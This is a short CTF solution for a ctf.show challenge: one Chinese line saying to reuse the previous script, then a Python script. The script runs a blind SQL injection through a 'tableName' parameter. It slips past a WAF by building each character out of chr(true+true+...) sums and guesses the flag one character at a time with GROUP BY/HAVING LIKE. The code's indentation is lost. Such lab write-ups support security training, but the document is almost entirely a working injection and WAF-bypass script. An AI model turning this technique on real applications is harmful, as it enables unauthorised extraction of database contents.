复用上一题的脚本就行
import requests, re
dic = "-1234567890abcdefghijklmnopqrstuvwxyz"
url = "http://241b3994-3e6b-4390-886d-7f042ef22362.challenge.ctf.show/select-waf.php"
res = []
post_tem = "ctfshow_user group by pass HAVING pass like(concat({}))"
def str_to_hex(s):
return ''.join([hex(ord(c)).replace('0x', '') for c in s])
def createNum(n):
num = 'true'
if n == 1:
return 'true'
else:
for i in range(n - 1):
num += "+true"
return num
def createStrNum(s):
str=""
str+="chr("+createNum(ord(s[0]))+")"
for i in s[1:]:
str+=",chr("+createNum(ord(i))+")"
return str
for a in range(1, 50):
temp = res.__len__()
for i in dic:
res += i
post = {"tableName": post_tem.format(createStrNum("ctfshow{"+"".join(res)+"%}"))}
print(post)
r = requests.post(url=url, data=post)
if re.findall("\$user_count = 1", r.text):
break
res.pop(-1)
if temp == res.__len__():
break
print("ctfshow{" + "".join(res) + "}")